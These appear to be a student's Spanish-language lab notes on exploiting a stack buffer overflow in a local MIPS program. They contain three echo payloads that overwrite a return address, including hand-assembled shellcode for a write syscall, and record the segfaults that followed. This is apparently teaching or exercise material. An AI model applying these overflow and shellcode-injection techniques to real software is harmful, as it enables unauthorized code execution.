Input 1: Salta a una posicion y loopea a sí misma.
echo -ne '000000000000\x5d\xf6\xff\x0b 99999999999900000000000000000000000000000000000000000000000000000000000\x00\x8d\x2d\x80\x01\x00\x00\x00\x74\xd9\xff\x7f' | ./a.out


Input 2: Tira segfault.
ASSEMBLY 
addi $v0, $0, 4
addi $a0, $0, 1
addi $a1, $0, 0x7fff
sll $a1, $a1, 4
addi $a1, $0, 0xd99c
addi $a2, $0, 80
syscall
j $ra

CODIGO (hay que invertir por el endianness)
20 02 00 04 ---- 04 00 02 20
20 04 00 01 ---- 01 00 04 20
20 05 7f ff ---- ff 7f 05 20
00 05 29 00 ---- 00 29 05 00
20 05 d9 9c ---- 9c d9 05 20 .
20 06 00 50 ---- 50 00 06 20
00 00 00 0c ---- 0c 00 00 00
08 00 00 00 ---- 00 00 00 08

INPUT (lleno con 0x36 para que imprima algo reconocible, el '6', creo)
echo -ne '999999999999\x04\x00\x02\x20\x01\x00\x04\x20\xff\x7f\x05\x20\x00\x29\x05\x00\x9c\xd9\x05\x20\x50\x00\x06\x20\x0c\x00\x00\x00\x00\x00\x00\x08\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\xb8\xd9\xff\x7fzzzyqqqqqqqq\x74\xd9\xff\x7f' | ./a.out


Input 3: Como el anterior, pero sin "j $ra" (tambien tira segfault)
Tambien tira: [ warning: LOW reference: vaddr=0x00000001, exception TLBL, pc=0x80236a6c <(no symbol)> ]
echo -ne '999999999999\x04\x00\x02\x20\x01\x00\x04\x20\xff\x7f\x05\x20\x00\x29\x05\x00\x9c\xd9\x05\x20\x50\x00\x06\x20\x0c\x00\x00\x00\x0c\x00\x00\x00\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\x36\xb8\xd9\xff\x7fzzzyqqqqqqqq\x74\xd9\xff\x7f' | ./a.out
